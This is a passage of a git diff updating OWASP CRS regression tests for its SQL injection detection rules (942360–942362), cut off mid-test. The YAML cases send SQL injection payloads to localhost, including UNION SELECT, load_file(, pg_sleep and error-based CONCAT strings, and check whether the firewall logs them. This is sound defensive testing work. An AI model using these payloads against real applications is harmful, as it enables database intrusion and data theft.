desc: "Detects concatenated basic SQL injection and SQLLFI attempts" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: ") as day1 FROM" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-30 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "6 As\" from" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-14 desc: GH issue 1580 stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: ModSecurity CRS 3 Tests - method: POST - port: 80 - uri: / - data: ", aside from" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - - test_title: 942360-31 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: ", aside from" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-15 desc: GH issue 1605 stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: ModSecurity CRS 3 Tests - method: POST - port: 80 - uri: / - data: "a=/create" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - - test_title: 942360-32 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "a=/create" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-16 desc: GH issue 1605 stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: ModSecurity CRS 3 Tests - method: POST - port: 80 - uri: / - data: "a=/CREATE TABLE Persons" - version: HTTP/1.0 - output: - log_contains: id "942360" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "a=/CREATE TABLE Persons" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-17 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: " Delete (Trashcan)" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-18 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "5desc" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-19 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "34-delete" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-20 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: " update" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-21 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "/select-quote" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-22 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: " Update: After..." + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-23 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "\"desc\"" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-24 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "a=/load.php" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-25 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "a=/update-assets" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-26 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "bla blabla live update chart" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-27 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: ".select-gws-banana" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-28 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "blablabla. As evidence from the following blablabla" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-29 + desc: GH issue 1816 - Known false positive + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "||(SELECT(DBMS_LDAP.INIT('169.1.1.1',19))FROM(DUAL))/investigate" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-30 + desc: GH issue 1816 - Known false positive + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "'||(select(pg_sleep(15))where(true))||'/investigate" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-31 + desc: GH issue 1816 - Known false positive + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "UNION ALL SELECT NULL,NULL,CONCAT(CONCAT('qqkjq','mxTSrPILRz'),'qvxvq')-- sqCV" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-32 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "2020-03-01 UNION ALL SELECT CONCAT" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-33 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "x\"; SELECT LOAD_FILE('" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-34 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "-1 UNION SELECT null,123456,null,null,null,null--" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-35 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "(CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(112)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (6557=6557" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-36 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: ") UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-37 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,CONCAT('vbulletin','rce',@@version)" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-38 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "(SELECT 4440 FROM(SELECT COUNT(*),CONCAT(0x716b627a71,(SELECT (ELT(4440=4440,1))),0x7170716271,FLOOR" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-39 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "2759399466.1534185336 -6863 union all select 1,1,1,1,1,1,1,1,1,CONCAT" + version: HTTP/1.0 + output: + log_contains: id "942360" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml index 4d0587c53f..fdb36966b5 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml @@ -1,126 +1,126 @@ --- - meta: - author: "Christoph Hansen" - description: None - enabled: true - name: 942361.yaml - tests: - - - test_title: 942361-1 +meta: + author: "Christoph Hansen" + description: None + enabled: true + name: 942361.yaml +tests: + - test_title: 942361-1 desc: "Detects basic SQL injection based on keyword alter or union" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "'alter a" - version: HTTP/1.0 - output: - log_contains: id "942361" - - - test_title: 942361-2 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "'alter a" + version: HTTP/1.0 + output: + log_contains: id "942361" + - test_title: 942361-2 desc: "Detects basic SQL injection based on keyword alter or union" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "\" ALTER A" - version: HTTP/1.0 - output: - log_contains: id "942361" - - - test_title: 942361-3 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "\" ALTER A" + version: HTTP/1.0 + output: + log_contains: id "942361" + - test_title: 942361-3 desc: "Detects basic SQL injection based on keyword alter or union" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "'ALTER A" - version: HTTP/1.0 - output: - log_contains: id "942361" - - - test_title: 942361-4 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "'ALTER A" + version: HTTP/1.0 + output: + log_contains: id "942361" + - test_title: 942361-4 desc: "Detects basic SQL injection based on keyword alter or union" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "' alter/" - version: HTTP/1.0 - output: - log_contains: id "942361" - - - test_title: 942361-5 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "' alter/" + version: HTTP/1.0 + output: + log_contains: id "942361" + - test_title: 942361-5 desc: "Detects basic SQL injection based on keyword alter or union" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "\" UNION A" - version: HTTP/1.0 - output: - log_contains: id "942361" - - - test_title: 942361-6 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "\" UNION A" + version: HTTP/1.0 + output: + log_contains: id "942361" + - test_title: 942361-6 desc: "Detects basic SQL injection based on keyword alter or union" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "'UNION A" - version: HTTP/1.0 - output: - log_contains: id "942361" - - - test_title: 942361-7 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "'UNION A" + version: HTTP/1.0 + output: + log_contains: id "942361" + - test_title: 942361-7 desc: "Detects basic SQL injection based on keyword alter or union" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "' union/" - version: HTTP/1.0 - output: - log_contains: id "942361" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "' union/" + version: HTTP/1.0 + output: + log_contains: id "942361" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942362.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942362.yaml new file mode 100644 index 0000000000..e990aff532 --- /dev/null +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942362.yaml @@ -0,0 +1,551 @@ +--- +meta: + author: "Christian S.J. Peron, Christoph Hansen, Franziska Buehler" + description: None + enabled: true + name: 942362.yaml +tests: + - test_title: 942362-1 + desc: "concatenated basic SQL injection and SQLLFI" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # 23423 as "sdfsdfs" FROM table + data: "var=1234%20AS%20%22foobar%22%20FROM%20tablevar2=whatever" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-2 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "select Char(" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-3 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT CHAR(" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-4 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT GROUP_CONCAT(" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-5 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT group_cOnCat(" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-6 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ") as cc FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-7 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ") AS orders FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-8 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ") AS `carrier_id` from" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-9 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "select load_file(" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-10 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ") AS Role FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-11 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "` AS `edit_user_id` from" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-12 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ") AS val FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-13 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=%60+REGEXP%20" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-14 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ") AS 'Durchschnitt_Importzeit' FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-15 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "` AS `OXTIMESTAMP` from" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-16 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ") as col_0_0_ from" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-17 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ") AS `count` FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-18 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ") AS schlagwoerter FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-19 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ") as User from" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-20 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ") AS t FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-21 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "(load_file(" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-22 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ") as ExecuteTheseSQLCommands FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-23 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ") AS schlagwoerter FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-24 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "` AS `documentType` FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-25 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "! As' from" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-26 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "; As not from" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-27 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT load_file(" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-28 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + 